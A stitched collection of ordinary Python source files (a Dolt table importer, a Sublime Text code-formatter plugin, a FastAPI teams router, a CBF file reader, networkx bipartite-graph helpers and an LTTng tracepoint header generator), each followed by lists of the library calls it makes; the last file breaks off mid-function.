clean = df.dropna(subset=primary_key)
clean.to_csv(filepath, index=False)
_import_helper(
dolt=dolt,
table=table,
write_import_file=writer,
primary_key=primary_key,
import_mode=import_mode,
commit=commit,
commit_message=commit_message,
commit_date=commit_date,
)
def _import_helper(
dolt: Dolt,
table: str,
write_import_file: Callable[[str], None],
import_mode: Optional[str] = None,
primary_key: Optional[List[str]] = None,
commit: Optional[bool] = False,
commit_message: Optional[str] = None,
commit_date: Optional[datetime.datetime] = None,
) -> None:
import_mode = _get_import_mode_and_flags(dolt, table, import_mode)
logger.info(f"Importing to table {table} in dolt directory located in {dolt.repo_dir()}, import mode {import_mode}")
fname = tempfile.mktemp(suffix=".csv")
import_flags = IMPORT_MODES_TO_FLAGS[import_mode]
try:
write_import_file(fname)
args = ["table", "import", table] + import_flags
if primary_key:
args += ["--pk={}".format(",".join(primary_key))]
dolt.execute(args + [fname])
if commit:
msg = commit_message or f"Committing write to table {table} in {import_mode} mode"
dolt.add(table)
dolt.commit(msg, date=commit_date)
finally:
if os.path.exists(fname):
os.remove(fname)
def _get_import_mode_and_flags(dolt: Dolt, table: str, import_mode: Optional[str] = None) -> str:
import_modes = IMPORT_MODES_TO_FLAGS.keys()
if import_mode and import_mode not in import_modes:
raise ValueError(f"update_mode must be one of: {import_modes}")
else:
if table in [table.name for table in dolt.ls()]:
logger.info(f'No import mode specified, table exists, using "{UPDATE}"')
import_mode = UPDATE
else:
logger.info(f'No import mode specified, table exists, using "{CREATE}"')
import_mode = CREATE
return import_mode
| [
"logging.getLogger",
"os.path.exists",
"csv.DictWriter",
"doltpy.shared.helpers.columns_to_rows",
"tempfile.mktemp",
"os.remove"
] | [((267, 294), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (284, 294), False, 'import logging\n'), ((4902, 4932), 'tempfile.mktemp', 'tempfile.mktemp', ([], {'suffix': '""".csv"""'}), "(suffix='.csv')\n", (4917, 4932), False, 'import tempfile\n'), ((5424, 5445), 'os.path.exists', 'os.path.exists', (['fname'], {}), '(fname)\n', (5438, 5445), False, 'import os\n'), ((2046, 2070), 'doltpy.shared.helpers.columns_to_rows', 'columns_to_rows', (['columns'], {}), '(columns)\n', (2061, 2070), False, 'from doltpy.shared.helpers import columns_to_rows\n'), ((3129, 3158), 'csv.DictWriter', 'csv.DictWriter', (['f', 'fieldnames'], {}), '(f, fieldnames)\n', (3143, 3158), False, 'import csv\n'), ((5459, 5475), 'os.remove', 'os.remove', (['fname'], {}), '(fname)\n', (5468, 5475), False, 'import os\n')] |
# @author <NAME>
# @copyright Copyright (c) 2008-2015, <NAME> aka LONGMAN (<EMAIL>)
# @link http://longman.me
# @license The MIT License (MIT)
import os
import sys
import re
import sublime
directory = os.path.dirname(os.path.realpath(__file__))
libs_path = os.path.join(directory, 'lib')
if libs_path not in sys.path:
sys.path.append(libs_path)
try:
# Python 3
from .phpformatter import PhpFormatter
from .jsformatter import JsFormatter
from .htmlformatter import HtmlFormatter
from .cssformatter import CssFormatter
from .scssformatter import ScssFormatter
from .pyformatter import PyFormatter
from .vbscriptformatter import VbscriptFormatter
from .coldfusionformatter import ColdfusionFormatter
from .goformatter import GoFormatter
except (ValueError):
# Python 2
from phpformatter import PhpFormatter
from jsformatter import JsFormatter
from htmlformatter import HtmlFormatter
from cssformatter import CssFormatter
from scssformatter import ScssFormatter
from pyformatter import PyFormatter
from vbscriptformatter import VbscriptFormatter
from coldfusionformatter import ColdfusionFormatter
from goformatter import GoFormatter
class Formatter:
def __init__(self, view, syntax=None):
self.platform = sublime.platform()
self.classmap = {}
self.st_version = 2
if sublime.version() == '' or int(sublime.version()) > 3000:
self.st_version = 3
self.file_name = view.file_name()
self.settings = sublime.load_settings('CodeFormatter.sublime-settings')
self.packages_path = sublime.packages_path()
self.syntax_file = view.settings().get('syntax')
self.syntax = syntax or self.get_syntax()
# map of settings names with related class
map_settings_formatter = [
('codeformatter_php_options', PhpFormatter),
('codeformatter_js_options', JsFormatter),
('codeformatter_css_options', CssFormatter),
('codeformatter_html_options', HtmlFormatter),
('codeformatter_python_options', PyFormatter),
('codeformatter_vbscript_options', VbscriptFormatter),
('codeformatter_scss_options', ScssFormatter),
('codeformatter_coldfusion_options', ColdfusionFormatter),
('codeformatter_go_options', GoFormatter),
]
for name, _class in map_settings_formatter:
syntaxes = self.settings.get(name, {}).get('syntaxes')
if not syntaxes or not isinstance(syntaxes, str):
continue
for _formatter in syntaxes.split(','):
self.classmap[_formatter.strip()] = _class
def format(self, text):
formatter = self.classmap[self.syntax](self)
try:
stdout, stderr = formatter.format(text)
except Exception as e:
stdout = ''
stderr = str(e)
return self.clean(stdout), self.clean(stderr)
def exists(self):
return self.syntax in self.classmap
def get_syntax(self):
pattern = re.compile(
r'Packages/.*/(.+?).(?=tmLanguage|sublime-syntax)')
m = pattern.search(self.syntax_file)
found = ''
if m and len(m.groups()) > 0:
found = m.groups()[0]
return found.lower()
def format_on_save_enabled(self):
if not self.exists():
return False
formatter = self.classmap[self.syntax](self)
return formatter.format_on_save_enabled(self.file_name)
def clean(self, string):
if hasattr(string, 'decode'):
string = string.decode('UTF-8', 'ignore')
return re.sub(r'\r\n|\r', '\n', string)
| [
"sublime.version",
"re.compile",
"os.path.join",
"sublime.packages_path",
"os.path.realpath",
"sublime.platform",
"re.sub",
"sys.path.append",
"sublime.load_settings"
] | [((299, 329), 'os.path.join', 'os.path.join', (['directory', '"""lib"""'], {}), "(directory, 'lib')\n", (311, 329), False, 'import os\n'), ((259, 285), 'os.path.realpath', 'os.path.realpath', (['__file__'], {}), '(__file__)\n', (275, 285), False, 'import os\n'), ((365, 391), 'sys.path.append', 'sys.path.append', (['libs_path'], {}), '(libs_path)\n', (380, 391), False, 'import sys\n'), ((1347, 1365), 'sublime.platform', 'sublime.platform', ([], {}), '()\n', (1363, 1365), False, 'import sublime\n'), ((1589, 1644), 'sublime.load_settings', 'sublime.load_settings', (['"""CodeFormatter.sublime-settings"""'], {}), "('CodeFormatter.sublime-settings')\n", (1610, 1644), False, 'import sublime\n'), ((1674, 1697), 'sublime.packages_path', 'sublime.packages_path', ([], {}), '()\n', (1695, 1697), False, 'import sublime\n'), ((3156, 3217), 're.compile', 're.compile', (['"""Packages/.*/(.+?).(?=tmLanguage|sublime-syntax)"""'], {}), "('Packages/.*/(.+?).(?=tmLanguage|sublime-syntax)')\n", (3166, 3217), False, 'import re\n'), ((3746, 3780), 're.sub', 're.sub', (['"""\\\\r\\\\n|\\\\r"""', '"""\n"""', 'string'], {}), "('\\\\r\\\\n|\\\\r', '\\n', string)\n", (3752, 3780), False, 'import re\n'), ((1432, 1449), 'sublime.version', 'sublime.version', ([], {}), '()\n', (1447, 1449), False, 'import sublime\n'), ((1463, 1480), 'sublime.version', 'sublime.version', ([], {}), '()\n', (1478, 1480), False, 'import sublime\n')] |
from typing import List, Optional
from attr import dataclass
from fastapi import APIRouter, Security
from fastapi.exceptions import HTTPException
from fastapi import Header
from pydantic import BaseModel
from pydantic.tools import parse_obj_as
from splash.api.auth import get_current_user
from splash.service import SplashMetadata
from splash.service.base import ObjectNotFoundError
from ..users import User
from . import NewTeam, Team
from .teams_service import TeamsService
teams_router = APIRouter()
@dataclass
class Services():
teams: TeamsService
services = Services(None)
def set_teams_service(svc: TeamsService):
services.teams = svc
class CreateTeamResponse(BaseModel):
uid: str
splash_md: SplashMetadata
@teams_router.get("", tags=["teams"], response_model=List[Team])
def read_teams(
page: int = 1,
page_size: int = 100,
current_user: User = Security(get_current_user)):
results = services.teams.retrieve_multiple(current_user, page=page, page_size=page_size)
return parse_obj_as(List[Team], list(results))
@teams_router.get("/{uid}", tags=['teams'], response_model=Team)
def read_team(
uid: str,
current_user: User = Security(get_current_user)):
team = services.teams.retrieve_one(current_user, uid)
return team
@teams_router.post("", tags=['teams'], response_model=CreateTeamResponse)
def create_team(
team: NewTeam,
current_user: User = Security(get_current_user)):
response = services.teams.create(current_user, team)
return response
@teams_router.put("/{uid}", tags=['teams'])
def update_team(uid: str,
team: NewTeam,
current_user: User = Security(get_current_user),
response_model=CreateTeamResponse,
if_match: Optional[str] = Header(None)):
try:
response = services.teams.update(current_user, team, uid, etag=if_match)
except ObjectNotFoundError:
raise HTTPException(404)
return response
| [
"fastapi.Security",
"fastapi.exceptions.HTTPException",
"fastapi.APIRouter",
"fastapi.Header"
] | [((494, 505), 'fastapi.APIRouter', 'APIRouter', ([], {}), '()\n', (503, 505), False, 'from fastapi import APIRouter, Security\n'), ((917, 943), 'fastapi.Security', 'Security', (['get_current_user'], {}), '(get_current_user)\n', (925, 943), False, 'from fastapi import APIRouter, Security\n'), ((1227, 1253), 'fastapi.Security', 'Security', (['get_current_user'], {}), '(get_current_user)\n', (1235, 1253), False, 'from fastapi import APIRouter, Security\n'), ((1491, 1517), 'fastapi.Security', 'Security', (['get_current_user'], {}), '(get_current_user)\n', (1499, 1517), False, 'from fastapi import APIRouter, Security\n'), ((1737, 1763), 'fastapi.Security', 'Security', (['get_current_user'], {}), '(get_current_user)\n', (1745, 1763), False, 'from fastapi import APIRouter, Security\n'), ((1858, 1870), 'fastapi.Header', 'Header', (['None'], {}), '(None)\n', (1864, 1870), False, 'from fastapi import Header\n'), ((2009, 2027), 'fastapi.exceptions.HTTPException', 'HTTPException', (['(404)'], {}), '(404)\n', (2022, 2027), False, 'from fastapi.exceptions import HTTPException\n')] |
#!/usr/bin/env libtbx.python
#
# iotbx.xds.xds_cbf.py
#
# <NAME>, Diamond Light Source, 2012/OCT/16
#
# Class to read the CBF files used in XDS
#
from __future__ import absolute_import, division, print_function
class reader:
"""A class to read the CBF files used in XDS"""
def __init__(self):
pass
def read_file(self, filename):
"""Read the CBF file"""
import pycbf
self.cbf_handle = pycbf.cbf_handle_struct()
self.cbf_handle.read_file(filename, pycbf.MSG_DIGEST)
self.cbf_handle.rewind_datablock()
def get_data(self):
"""Get the gain array from the file"""
import numpy
# Select the first datablock and rewind all the categories
self.cbf_handle.select_datablock(0)
self.cbf_handle.select_category(0)
self.cbf_handle.select_column(2)
self.cbf_handle.select_row(0)
# Check the type of the element to ensure it's a binary
# otherwise raise an exception
type = self.cbf_handle.get_typeofvalue()
if type.find('bnry') > -1:
# Read the image data into an array
image_string = self.cbf_handle.get_integerarray_as_string()
image = numpy.fromstring(image_string, numpy.int32)
# Get the array parameters
parameters = self.cbf_handle.get_integerarrayparameters_wdims()
image_size = (parameters[10], parameters[9])
# Resize the image
image.shape = (image_size)
else:
raise TypeError('Can\'t find image')
# Return the image
return image
if __name__ == '__main__':
import sys
import numpy
handle = reader()
handle.read_file(sys.argv[1])
image = handle.get_data()
| [
"pycbf.cbf_handle_struct",
"numpy.fromstring"
] | [((412, 437), 'pycbf.cbf_handle_struct', 'pycbf.cbf_handle_struct', ([], {}), '()\n', (435, 437), False, 'import pycbf\n'), ((1127, 1170), 'numpy.fromstring', 'numpy.fromstring', (['image_string', 'numpy.int32'], {}), '(image_string, numpy.int32)\n', (1143, 1170), False, 'import numpy\n')] |
# utils for graphs of the networkx library
import copy
import networkx as nx
from networkx.algorithms.shortest_paths import shortest_path
from typing import Any, Union, Optional, Iterator, Iterable, Tuple, Dict, List, cast
LEFT = 0
RIGHT = 1
def top_nodes(graph: nx.Graph,
data: bool = False) -> Union[Iterator[Any], Iterator[Tuple[Any, Any]]]:
for node_id, node_data in graph.nodes(data=True).__iter__():
if node_data['bipartite'] == 0:
if data:
yield node_id, node_data
else:
yield node_id
def bottom_nodes(graph: nx.Graph,
data: bool = False) -> Union[Iterator[Any], Iterator[Tuple[Any, Any]]]:
for node_id, node_data in graph.nodes(data=True).__iter__():
if node_data['bipartite'] == 1:
if data:
yield node_id, node_data
else:
yield node_id
def bipartite_node_positions(graph: nx.Graph) -> Dict[int, Tuple[int, int]]:
pos: Dict[int, Tuple[int, int]] = dict()
pos.update((n, (1, i)) for i, n in enumerate(top_nodes(graph))) # put nodes from X at x=1
pos.update((n, (2, i)) for i, n in enumerate(bottom_nodes(graph))) # put nodes from Y at x=2
return pos
def draw_bipartite(graph: nx.Graph) -> None:
pos = bipartite_node_positions(graph)
nx.draw(graph, pos=pos, with_labels=True, font_weight='bold')
def draw_nodes(graph: nx.Graph, labels: bool = False) -> None:
pos = bipartite_node_positions(graph)
nx.draw_networkx_nodes(graph, pos=pos, node_size=300)
if labels:
top_node_labels = {k: str(v['label']) for k, v in tuple(top_nodes(graph, data=True))}
nx.draw_networkx_labels(graph, pos=pos, labels=top_node_labels, horizontalalignment='left')
bottom_node_labels = {k: str(v['label']) for k, v in tuple(bottom_nodes(graph, data=True))}
nx.draw_networkx_labels(graph,
pos=pos,
labels=bottom_node_labels,
horizontalalignment='right')
else:
nx.draw_networkx_labels(graph, pos=pos)
def draw_edges(graph: nx.Graph, edge_list: Optional[Iterable[Tuple[Any, Any]]] = None) -> None:
pos = bipartite_node_positions(graph)
nx.draw_networkx_edges(graph, pos=pos, edgelist=edge_list)
def draw_matching(graph: nx.Graph, matching: Dict[Any, Any], labels: bool = False) -> None:
draw_nodes(graph, labels=labels)
draw_edges(graph, matching.items())
def find_cycle_with_edge_of_matching(graph: nx.Graph, matching: Dict[Any, Any]) -> List[Any]:
tmp_graph = copy.deepcopy(graph)
# Remove the edge so and find a path from a node of the edge to the other one.
# If a path is found, the circle is completed with the removed edge
for k, v in matching.items():
if not tmp_graph.has_edge(k, v):
# The graph could have been reduced
continue
tmp_graph.remove_edge(k, v)
try:
path = shortest_path(G=tmp_graph, source=v, target=k)
except nx.NetworkXNoPath:
tmp_graph.add_edge(k, v)
continue
else:
tmp_graph.add_edge(k, v)
return cast(List[Any], path)
# No cycle was found
raise nx.NetworkXNoCycle
def find_feasible_two_edge_path(graph: nx.Graph,
matching: Dict[Any, Any]) -> Optional[Tuple[Any, Any, Any]]:
# This path has the form top1 -> bottom -> top2 or bottom1 -> top -> bottom2
# first: must be in the left part of the graph and in matching
# second: must be in the right part of the graph and in matching
# third: is also in the left part of the graph and but must not be in matching
for top, bottom in matching.items():
if top in top_nodes(graph) and bottom in bottom_nodes(graph):
for new_bottom in graph.neighbors(top):
if new_bottom not in matching.values():
return (bottom, top, new_bottom)
for new_top in graph.neighbors(bottom):
if new_top not in matching:
return (top, bottom, new_top)
return None
def strongly_connected_components_decomposition(graph: nx.DiGraph) -> nx.DiGraph:
scc = nx.strongly_connected_components(graph)
for cc in scc:
for node in cc:
to_remove = set()
for neighbor in graph.adj[node]:
if neighbor not in cc:
to_remove.add(neighbor)
for neighbor in to_remove:
graph.remove_edge(node, neighbor)
return graph
def create_directed_matching_graph(graph: nx.Graph, top_nodes: Iterable[Any],
matching: Dict[Any, Any]) -> nx.DiGraph:
# creates a directed copy of the graph with all edges on both directions
directed_graph = graph.to_directed()
for top_node in top_nodes:
for bottom_node in graph.adj[top_node]:
if top_node in matching.keys() and bottom_node == matching[top_node]:
directed_graph.remove_edge(bottom_node, top_node)
else:
directed_graph.remove_edge(top_node, bottom_node)
# check for duplicated (should not exist any)
ordered_edges = [tuple(sorted(e)) for e in directed_graph.edges]
assert len(ordered_edges) == len(set(ordered_edges))
assert len(graph.edges) == len(directed_graph.edges)
assert len(graph.nodes) == len(directed_graph.nodes)
return directed_graph
def graph_without_nodes_of_edge(graph: nx.Graph, edge: Tuple[Any, Any]) -> nx.Graph:
"""Returns a copy of this bipartite graph with the given edge and its adjacent nodes removed."""
new_graph = nx.Graph(graph)
new_graph.remove_node(edge[0])
new_graph.remove_node(edge[1])
assert new_graph != graph
assert len(new_graph.nodes) == len(graph.nodes) - 2
return new_graph
def graph_without_edge(graph: nx.Graph, edge: Tuple[Any, Any]) -> nx.Graph:
"""Returns a copy of this bipartite graph with the given edge removed."""
new_graph = nx.Graph(graph)
new_graph.remove_edge(*edge)
assert len(new_graph.edges) == len(graph.edges) - 1
assert len(new_graph.nodes) == len(graph.nodes)
return new_graph | [
"networkx.algorithms.shortest_paths.shortest_path",
"networkx.strongly_connected_components",
"networkx.Graph",
"networkx.draw_networkx_nodes",
"networkx.draw_networkx_labels",
"copy.deepcopy",
"networkx.draw_networkx_edges",
"typing.cast",
"networkx.draw"
] | [((1342, 1403), 'networkx.draw', 'nx.draw', (['graph'], {'pos': 'pos', 'with_labels': '(True)', 'font_weight': '"""bold"""'}), "(graph, pos=pos, with_labels=True, font_weight='bold')\n", (1349, 1403), True, 'import networkx as nx\n'), ((1515, 1568), 'networkx.draw_networkx_nodes', 'nx.draw_networkx_nodes', (['graph'], {'pos': 'pos', 'node_size': '(300)'}), '(graph, pos=pos, node_size=300)\n', (1537, 1568), True, 'import networkx as nx\n'), ((2280, 2338), 'networkx.draw_networkx_edges', 'nx.draw_networkx_edges', (['graph'], {'pos': 'pos', 'edgelist': 'edge_list'}), '(graph, pos=pos, edgelist=edge_list)\n', (2302, 2338), True, 'import networkx as nx\n'), ((2622, 2642), 'copy.deepcopy', 'copy.deepcopy', (['graph'], {}), '(graph)\n', (2635, 2642), False, 'import copy\n'), ((4268, 4307), 'networkx.strongly_connected_components', 'nx.strongly_connected_components', (['graph'], {}), '(graph)\n', (4300, 4307), True, 'import networkx as nx\n'), ((5723, 5738), 'networkx.Graph', 'nx.Graph', (['graph'], {}), '(graph)\n', (5731, 5738), True, 'import networkx as nx\n'), ((6089, 6104), 'networkx.Graph', 'nx.Graph', (['graph'], {}), '(graph)\n', (6097, 6104), True, 'import networkx as nx\n'), ((1686, 1781), 'networkx.draw_networkx_labels', 'nx.draw_networkx_labels', (['graph'], {'pos': 'pos', 'labels': 'top_node_labels', 'horizontalalignment': '"""left"""'}), "(graph, pos=pos, labels=top_node_labels,\n horizontalalignment='left')\n", (1709, 1781), True, 'import networkx as nx\n'), ((1886, 1985), 'networkx.draw_networkx_labels', 'nx.draw_networkx_labels', (['graph'], {'pos': 'pos', 'labels': 'bottom_node_labels', 'horizontalalignment': '"""right"""'}), "(graph, pos=pos, labels=bottom_node_labels,\n horizontalalignment='right')\n", (1909, 1985), True, 'import networkx as nx\n'), ((2096, 2135), 'networkx.draw_networkx_labels', 'nx.draw_networkx_labels', (['graph'], {'pos': 'pos'}), '(graph, pos=pos)\n', (2119, 2135), True, 'import networkx as nx\n'), ((3010, 3056), 'networkx.algorithms.shortest_paths.shortest_path', 'shortest_path', ([], {'G': 'tmp_graph', 'source': 'v', 'target': 'k'}), '(G=tmp_graph, source=v, target=k)\n', (3023, 3056), False, 'from networkx.algorithms.shortest_paths import shortest_path\n'), ((3219, 3240), 'typing.cast', 'cast', (['List[Any]', 'path'], {}), '(List[Any], path)\n', (3223, 3240), False, 'from typing import Any, Union, Optional, Iterator, Iterable, Tuple, Dict, List, cast\n')] |
#-------------------------------------------------------------------------------------------------------
# Copyright (C) Microsoft. All rights reserved.
# Licensed under the MIT license. See LICENSE.txt file in the project root for full license information.
#-------------------------------------------------------------------------------------------------------
import xml.dom.minidom as DOM
lttngDataTypeMapping = {
"win:null" :" ",
"win:Int64" :"const __int64",
"win:ULong" :"const unsigned long",
"win:count" :"*",
"win:Struct" :"const char *",
"win:GUID" :"const int",
"win:AnsiString" :"const char*",
"win:UnicodeString" :"const char*",
"win:Double" :"const double",
"win:Int32" :"const signed int",
"win:HexInt32" :"const signed int",
"win:Boolean" :"const bool",
"win:UInt64" :"const unsigned __int64",
"win:UInt32" :"const unsigned int",
"win:UInt16" :"const unsigned short",
"win:UInt8" :"const unsigned char",
"win:Int8" :"const char",
"win:Pointer" :"const uintptr_t",
"win:Binary" :"const char"
}
ctfDataTypeMapping = {
"win:Int64" :"ctf_integer",
"win:HexInt64" :"ctf_integer_hex",
"win:ULong" :"ctf_integer",
"win:count" :"ctf_sequence",
"win:Struct" :"ctf_sequence",
"win:GUID" :"ctf_sequence",
"win:AnsiString" :"ctf_string",
"win:UnicodeString" :"ctf_string",
"win:Double" :"ctf_float",
"win:Int32" :"ctf_integer",
"win:HexInt32" :"ctf_integer_hex",
"win:Boolean" :"ctf_integer",
"win:UInt64" :"ctf_integer",
"win:UInt32" :"ctf_integer",
"win:UInt16" :"ctf_integer",
"win:HexInt16" :"ctf_integer_hex",
"win:UInt8" :"ctf_integer", #actually a character
"win:Int8" :"ctf_integer", #actually a character
"win:Pointer" :"ctf_integer",
"win:Binary" :"ctf_sequence",
"xs:string" :"ctf_string",
"xs:unsignedLong" :"ctf_integer",
"xs:unsignedInt" :"ctf_integer"
}
palDataTypeMapping ={
"win:null" :" ",
"win:Int64" :"const __int64",
"win:ULong" :"const unsigned long",
"win:count" :"*",
"win:Struct" :"const void",
"win:GUID" :"const GUID",
"win:AnsiString" :"LPCSTR",
"win:UnicodeString" :"PCWSTR",
"win:Double" :"const double",
"win:Int32" :"const signed int",
"win:HexInt32" :"const signed int",
"win:Boolean" :"const bool",
"win:UInt64" :"const unsigned __int64",
"win:UInt32" :"const unsigned int",
"win:UInt16" :"const unsigned short",
"win:UInt8" :"const unsigned char",
"win:Int8" :"const char",
"win:Pointer" :"const void*",
"win:Binary" :"const char"
}
MAX_LTTNG_ARGS = 10
def getParamSequenceSize(paramSequence, estimate):
total = 0
pointers =0
for param in paramSequence:
if param in ["win:Int64", "win:UInt64", "win:Double"]:
total += 8
elif param in ["win:ULong", "win:Int32", "win:Boolean",]:
total += 4
elif param == "GUID":
total += 16
elif param in ["win:UInt16"]:
total += 2
elif param in ["win:Uint8", "win:Binary"]:
total += 1
elif param == "win:Pointer":
if estimate:
total += 8
else:
pointers += 1
elif estimate:
if param in ["win:AnsiString", "win:Struct"]:
total += 32
elif param in ["win:UnicodeString"]:
total += 64
else:
raise Exception ("Don't know size of " + param)
if estimate:
return total
return total, pointers
class Template:
def __repr__(self):
return "<Template " + self.name + " />"
def __init__(self, name, prototypes, dependencies, structCounts, arrayCounts):
self.name = name
self.signature = FunctionSignature()
self.structCounts = structCounts
self.arrayCounts = arrayCounts
for variable in prototypes.paramList:
for dependency in dependencies[variable]:
if not self.signature.getParam(dependency):
self.signature.append(dependency, prototypes.getParam(dependency))
@property
def num_params(self):
return len(self.signature.paramList)
def getParam(self, name):
return self.signature.getParam(name)
@property
def estimatedSize(self):
total = getParamSequenceSize((self.getParam(paramName).winType for paramName in self.signature.paramList), True)
if total < 32:
return 32
elif total > 1024:
return 1024
return total
class FunctionSignature:
def __repr__(self):
return ', '.join(self.paramList)
def __init__(self):
self.LUT = {}
self.paramList = []
def append(self, variable, param):
self.LUT[variable] = param
self.paramList.append(variable)
def getParam(self, variable):
return self.LUT.get(variable)
def getLength(self):
return len(self.paramList)
class FunctionParameter:
def __repr__(self):
return self.name
def __init__(self, winType, name, count, outType, length):
self.winType = winType
self.outType = outType
self.name = name
self.length = length
self.count = "win:null"
if winType == "win:GUID" or count == "win:count":
self.count = "win:count"
ignoredXmlAttributes = frozenset(["map"])
usedXmlAttributes = frozenset(["name", "inType", "count", "length", "outType"])
knownXmlAttributes = ignoredXmlAttributes | usedXmlAttributes
def checkKnownAttributes(nodes, templateName):
for node in nodes:
nodeMap = node.attributes
for attribute in nodeMap.values():
if attribute.name not in knownXmlAttributes:
raise ValueError('Unknown attribute: ' + attribute.name + ' in template ' + templateName)
def getTopLevelElementsByTagName(node, tag):
return [e for e in node.getElementsByTagName(tag) if e.parentNode == node]
def parseTemplateNodes(templateNodes):
templates = {}
for templateNode in templateNodes:
templateName = templateNode.getAttribute('tid')
dataNodes = getTopLevelElementsByTagName(templateNode, 'data')
checkKnownAttributes(dataNodes, templateName)
functionPrototypes = FunctionSignature()
arrayCounts = {}
structCounts = {}
var_Dependencies = {}
for dataNode in dataNodes:
variable = dataNode.getAttribute('name')
wintype = dataNode.getAttribute('inType')
outType = dataNode.getAttribute('outType')
wincount = dataNode.getAttribute('count')
winLength = dataNode.getAttribute('length')
var_dependency = [variable]
if winLength:
if wincount:
raise Exception("Both count and length properties found on " + variable + " in template " + templateName)
if wincount.isdigit() and int(wincount) == 1:
wincount = ''
if wincount:
if wincount.isdigit():
raise Exception("Expect constant count to be length")
elif functionPrototypes.getParam(wincount):
var_dependency.insert(0, wincount)
arrayCounts[variable] = wincount
var_Dependencies[variable] = var_dependency
functionParameter = FunctionParameter(wintype, variable, wincount, outType, winLength)
functionPrototypes.append(variable, functionParameter)
structNodes = getTopLevelElementsByTagName(templateNode, 'struct')
for structNode in structNodes:
structName = structNode.getAttribute('name')
countName = structNode.getAttribute('count')
assert(countName in functionPrototypes.paramList)
#childData = structNode.getElementsByTagName("data")
#names = [x.attributes['name'].value for x in childData]
#types = [x.attributes['inType'].value for x in childData]
structCounts[structName] = countName
var_Dependencies[structName] = [countName, structName]
functionParameterPointer = FunctionParameter("win:Struct", structName, "win:count", None, None)
functionPrototypes.append(structName, functionParameterPointer)
templates[templateName] = Template(templateName, functionPrototypes, var_Dependencies, structCounts, arrayCounts)
return templates
def shouldPackTemplate(template):
return template.num_params > MAX_LTTNG_ARGS or len(template.structCounts) > 0 or len(template.arrayCounts) > 0
def generateArgList(template):
# Construct a TP_ARGS macro call, as defined in another macro, e.g.
#
# TP_ARGS( \
# int, my_integer_arg, \
# char*, my_string_arg \
# )
header = "TP_ARGS( \\\n"
footer = "\\\n)"
args = []
if shouldPackTemplate(template):
args.append(" const unsigned int, length")
args.append(" const char *, __data__")
else:
signature = template.signature
for param in signature.paramList:
functionParam = signature.getParam(param)
wintypeName = functionParam.winType
mappedType = lttngDataTypeMapping[wintypeName]
winCount = functionParam.count
mappedCount = lttngDataTypeMapping[winCount]
arg = " " + mappedType
if mappedCount != " ":
arg += mappedCount
elif functionParam.length:
arg += "*"
arg += ", " + functionParam.name
args.append(arg)
return header + ", \\\n".join(args) + footer
def generateFieldList(template):
# Construct a TP_FIELDS macro call, e.g.
# TP_FIELDS(
# ctf_string(my_string_field, my_string_arg)
# ctf_integer(int, my_integer_field, my_integer_arg)
# )
header = " " + " TP_FIELDS(\n"
footer = "\n )"
fieldList = []
if shouldPackTemplate(template):
fieldList.append(" ctf_integer(unsigned long, length, length)")
fieldList.append(" ctf_sequence(char, __data__, __data__, unsigned long, length)")
else:
signature = template.signature
for param in signature.paramList:
functionParam = signature.getParam(param)
wintypeName = functionParam.winType
winCount = functionParam.count
mappedCount = lttngDataTypeMapping[winCount]
mappedType = lttngDataTypeMapping[wintypeName].replace("const ", "")
if functionParam.outType:
wintypeName = functionParam.outType
ctf_type = None
field_body = None
varname = functionParam.name
if param in template.structCounts or param in template.arrayCounts:
# This is a struct, treat as a sequence
countVar = template.structCounts.get(param, template.arrayCounts.get(param))
ctf_type = "ctf_sequence"
field_body = ", ".join((mappedType, varname, varname, "size_t", functionParam.prop))
elif functionParam.length:
ctf_type = "ctf_sequence"
field_body = ", ".join((mappedType, varname, varname, "size_t", functionParam.length))
else:
ctf_type = ctfDataTypeMapping[wintypeName]
if ctf_type == "ctf_string":
field_body = ", ".join((varname, varname))
elif ctf_type == "ctf_integer" or ctf_type == "ctf_integer_hex" or ctf_type == "ctf_float":
field_body = ", ".join((mappedType, varname, varname))
elif ctf_type == "ctf_sequence":
raise Exception("ctf_sequence needs special handling: " + template.name + " " + param)
else:
raise Exception("Unhandled ctf intrinsic: " + ctf_type)
# fieldList.append("// " + wintypeName)
fieldList.append(" %s(%s)" % (ctf_type, field_body))
return header + "\n".join(fieldList) + footer
def generateLttngHeader(providerName, lttngEventHeaderShortName, templates, events):
headerLines = []
headerLines.append("")
headerLines.append("#ifdef __int64")
headerLines.append("#if TARGET_64")
headerLines.append("#undef __int64")
headerLines.append("#else")
headerLines.append("#error \"Linux and OSX builds only support 64bit platforms\"")
headerLines.append("#endif // TARGET_64")
headerLines.append("#endif // __int64")
headerLines.append("#undef TRACEPOINT_PROVIDER")
headerLines.append("#undef TRACEPOINT_INCLUDE")
headerLines.append("")
headerLines.append("#define TRACEPOINT_PROVIDER " + providerName + "\n")
headerLines.append("#define TRACEPOINT_INCLUDE \"./" + lttngEventHeaderShortName + "\"\n\n")
headerLines.append("#if !defined(LTTNG_CHAKRA_H" + providerName + ") || defined(TRACEPOINT_HEADER_MULTI_READ)\n\n")
headerLines.append("#define LTTNG_CHAKRA_H" + providerName +"\n")
headerLines.append("\n#include <lttng/tracepoint.h>\n\n")
for templateName in templates:
template = templates[templateName]
functionSignature = template.signature
headerLines.append("")
headerLines.append("#define " + templateName + "_TRACEPOINT_ARGS \\")
tracepointArgs = generateArgList(template)
headerLines.append(tracepointArgs)
headerLines.append("TRACEPOINT_EVENT_CLASS(")
headerLines.append(" " + providerName + ",")
headerLines.append(" " + templateName + ",")
headerLines.append(" " + templateName + "_TRACEPOINT_ARGS,")
tracepointFields = generateFieldList(template)
headerLines.append(tracepointFields)
headerLines.append(")")
headerLines.append("#define " + templateName + "T_TRACEPOINT_INSTANCE(name) \\")
headerLines.append("TRACEPOINT_EVENT_INSTANCE(\\")
headerLines.append(" " + providerName + ",\\")
headerLines.append(" " + templateName + ",\\")
headerLines.append(" name,\\")
headerLines.append(" " + templateName + "_TRACEPOINT_ARGS \\")
headerLines.append(")")
headerLines.append("")
headerLines.append("")
headerLines.append("TRACEPOINT_EVENT_CLASS(")
headerLines.append(" " + providerName + ",")
headerLines.append(" emptyTemplate,")
headerLines.append(" TP_ARGS(),")
headerLines.append(" TP_FIELDS()")
headerLines.append(")")
headerLines.append("#define T_TRACEPOINT_INSTANCE(name) \\")
headerLines.append("TRACEPOINT_EVENT_INSTANCE(\\")
headerLines.append(" " + providerName + ",\\")
headerLines.append(" emptyTemplate,\\")
headerLines.append(" name,\\")
headerLines.append(" TP_ARGS()\\")
headerLines.append(")")
headerLines.append("")
for eventNode in events:
eventName = eventNode.getAttribute('symbol')
templateName = eventNode.getAttribute('template')
if not eventName:
raise Exception(eventNode + " event does not have a symbol")
if not templateName:
